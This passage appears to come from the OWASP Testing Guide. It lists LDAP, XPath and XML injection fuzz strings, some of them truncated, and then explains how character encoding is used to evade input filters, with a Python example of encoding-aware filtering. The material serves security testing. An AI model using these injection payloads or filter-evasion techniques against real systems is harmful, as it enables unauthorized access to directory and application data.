221
LDAP Injection
For details on LDAP Injection: Testing for LDAP Injection
|
!
(
)
%28
%29
&
%26
%21
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
*()|%26'
admin*
admin*)((|userPassword=*)
*)(uid=*))(|(uid=*
XPATH Injection
For details on XPATH Injection: Testing for XPath Injection
'+or+'1'='1
'+or+''='
x'+or+1=1+or+'x'='y
/
/
/ *
*/*
@*
count(/child::node())
x'+or+name()='username'+or+'x'='y
XML Injection
Details on XML Injection here: Testing for XML Injection
var n=0;while(true){n++;}]]>
SCRIPT]]>alert('gotcha');/
SCRIPT]]>
]>&xee;
]>&xee;
]>&xee;
]>&xee;
OWASP Testing Guide Appendix D: Encoded Injection

Background

Character encoding is the process of mapping characters, numbers and other symbols to a standard format. Typically, this is done to create a message ready for transmission between sender and receiver. It is, in simple terms, the conversion of characters (belonging to different languages like English, Chinese, Greek or any other known language) into bytes. An example of a widely used character encoding scheme is the American Standard Code for Information Interchange (ASCII), which initially used 7-bit codes. More recent examples of encoding schemes are the Unicode UTF-8 and UTF-16 computing industry standards.

In the space of application security, and due to the plethora of encoding schemes available, character encoding has a popular misuse: it is used to encode malicious injection strings in a way that obfuscates them. This can lead to the bypass of input validation filters, or take advantage of particular ways in which browsers render encoded text.
Input Encoding – Filter Evasion

Web applications usually employ different types of input filtering mechanisms to limit the input that can be submitted by the user. If these input filters are not implemented sufficiently well, it is possible to slip a character or two through them. For instance, a / can be represented as 2F (hex) in ASCII, while the same character (/) is encoded as C0 AF in Unicode (a 2-byte sequence). Therefore, it is important for the input filtering control to be aware of the encoding scheme used. If the filter is found to be detecting only UTF-8 encoded injections, a different encoding scheme may be employed to bypass this filter.
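The defensive counterpart to the point above (and to the percent-encoded variants in the LDAP fuzz vector list) is to canonicalize input before filtering it. The following is an added illustration, not code from the OWASP guide: the blocked-character set and the two filter functions are hypothetical, and the strict UTF-8 decode is what rejects an overlong sequence such as C0 AF instead of letting it pass as a disguised /.

```python
import urllib.parse

# Hypothetical set of metacharacters the filter forbids (assumption for
# this example; a real filter would be tied to the downstream interpreter).
BLOCKED = set("/|*()&!")


def naive_filter(raw: bytes) -> bool:
    """Byte-level check that only looks for the literal ASCII '/'.

    It accepts both the percent-encoded form %2F and the malformed
    two-byte sequence C0 AF, because neither contains byte 0x2F.
    """
    return b"/" not in raw


def canonicalize(raw: bytes) -> str:
    """Percent-decode, then decode as UTF-8 in strict mode.

    Strict decoding raises UnicodeDecodeError on overlong or otherwise
    invalid sequences (e.g. C0 AF), so a malformed encoding of '/' is
    surfaced as an error rather than silently normalized to '/'.
    """
    percent_decoded = urllib.parse.unquote_to_bytes(raw)
    return percent_decoded.decode("utf-8", errors="strict")


def encoding_aware_filter(raw: bytes) -> bool:
    """Accept only input that is valid UTF-8 and free of blocked characters.

    Canonicalizing first means the filter sees the same characters the
    downstream component (LDAP, XPath, XML parser) will see.
    """
    try:
        text = canonicalize(raw)
    except UnicodeDecodeError:
        return False  # malformed encoding: reject rather than guess
    return not (BLOCKED & set(text))


if __name__ == "__main__":
    # Constructed sample inputs: a benign value and two disguised slashes.
    for sample in (b"alice", b"%2F", b"\xc0\xaf"):
        print(sample, naive_filter(sample), encoding_aware_filter(sample))
```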
Output Encoding – Server & Browser Consensus

Web browsers need to be aware of the encoding scheme used to coherently display a web page. Ideally, this information should be provided to the browser in the HTTP header ("Content-Type") field, as shown below:

Content-Type: text/html; charset=UTF-8

or through an HTML META tag ("META HTTP-EQUIV"), as shown below:

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

It is through these character encoding declarations that the browser understands which set of characters to use when converting bytes to characters. Note that the content type mentioned in the HTTP header has precedence over the META tag declaration.
CERT describes it here as follows:

Many web pages leave the character encoding ("charset" parameter in HTTP) undefined. In earlier versions of HTML and HTTP, the character encoding was supposed to default to ISO-8859-1 if it wasn't defined. In fact, many browsers had a different default, so it was not possible to rely on the default being ISO-8859-1. HTML version 4 legitimizes this - if the character encoding isn't specified, any character